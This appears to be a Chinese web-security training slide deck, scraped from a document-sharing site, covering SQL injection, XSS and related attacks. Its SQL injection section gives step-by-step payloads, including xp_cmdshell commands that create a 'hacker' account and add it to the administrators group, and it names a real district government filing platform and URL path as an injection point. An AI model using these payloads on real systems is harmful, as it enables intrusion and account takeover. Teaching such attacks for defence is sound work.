- 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
- 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
文档全是精心选出来的精品资料,绝对值得下载!
聂万泉(Wquan.Nie)
CISSP(Associate) Advanced programmer
Email:SoftDev@c‐
QQ:256796
MSN:nagemeiyou@
常用的Web攻击手法
如何安全的与用户交互
加密技术Web开发应用
Web开发与数据库安全
Web安全测试
Sql Injection
Xss (跨站脚本攻击)
bypass Upload
Brute Force(穷举)
Session Spoof
Remote/Local File Include
程序向程序文件内写入参数
其它攻击方法
利用现有的应用程序没有对用户输入数据进行检查和过滤的缺陷,
将恶意的SQL命令注入到后台数据库引擎执行,达到获取数据,甚至控制
数据库服务器的目的.
典型例子:
/index.asp?id=8 and (select count(*) from
sysobjects)0
• Sql注入的漏洞是在编程时造成的
• 后台数据库允许动态SQL语句执行
• 前台应用程序没有对用户输入的数据或者页面提
交的信息进行必要的安全检查
• 数据库自身的特性造成的,与编程语言无关.
• 绕过防火墙进行攻击
• 绕过web应用程序的验证过程
• 非法越权操作数据库内容
• 随意篡改网页内容
• 添加系统帐户或数据库帐户
• 上传和下载非法文件
• 本地溢出并获取系统最高权限
• 安装木马后门网络僵尸
• JSP应用程序
• PHP应用程序
• Asp应用程序
• .net应用程序
• MSSQL (危害最大)
• Mysql
• Oracle
• 其它数据库Sybase,DB2,Access
小榕工具WIS,WED
NBSI
阿D注入工具
明小子
…………
1.判断是否存在注入
在页面地址后面加 ’ | and 1=1 | and 1=2
返回显示错误或不正常代表有注入漏洞
2.判断数据库类型
Id=1 and (select count(*) from sysobjects)0
可判断是MSSQL还是ACCESS
3.判断当前权限
Id=1 and 1=(SELECT IS_MEMBER(\db_owner\));‐‐
db_owner可更换成其它mssql角色名比如SYSADMIN
4.检查扩展存储是否存在
Select count(*) from master.dbo.sysobjects where xtype=\x\ and
name=\xp_cmdshell\‘
5.SA权限模式下建立系统用户
;exec master.dbo.xp_cmdshell \net user hacker 123456 /add\
;exec master.dbo.xp_cmdshell \net localgroup administrators hacker
/add\
/wssp/shenbaofront/index.jsp
海淀区人民政府行政办事中心‐网上申报平台
注入点:
:80/wssp/shenbaofront/question_text.jsp?act=questioninfoque
stion
检测截图:
Cross site Scripting (XSS)
黑客在应用程序中非法插入HTML代码
当受害者浏览该页时,嵌入其中的恶意代码
会被执行,从而达到恶意目的.
XSS 的攻击类型
1.跨站点的攻击,特指在虚拟主机上的攻击方式.
2.针对session,Cookie的劫持攻击
3.恶作剧攻击
4.Xss攻击通常要与社会工程学结合起来使用
5.模拟用户完成多页表单。
• XSS攻击导致恶意攻击者
1.绕过访问控制
2.权限提升
3.篡改网站页面
4.得到敏感信息(用户帐号,密码,信用卡等)
5. 其它
• 敏感数据被获取(Cookie 盗窃)
• 网络钓鱼
• 获取Web用户浏览的网页内容
• Session Riding(CSRF攻击)
• 获取
文档评论(0)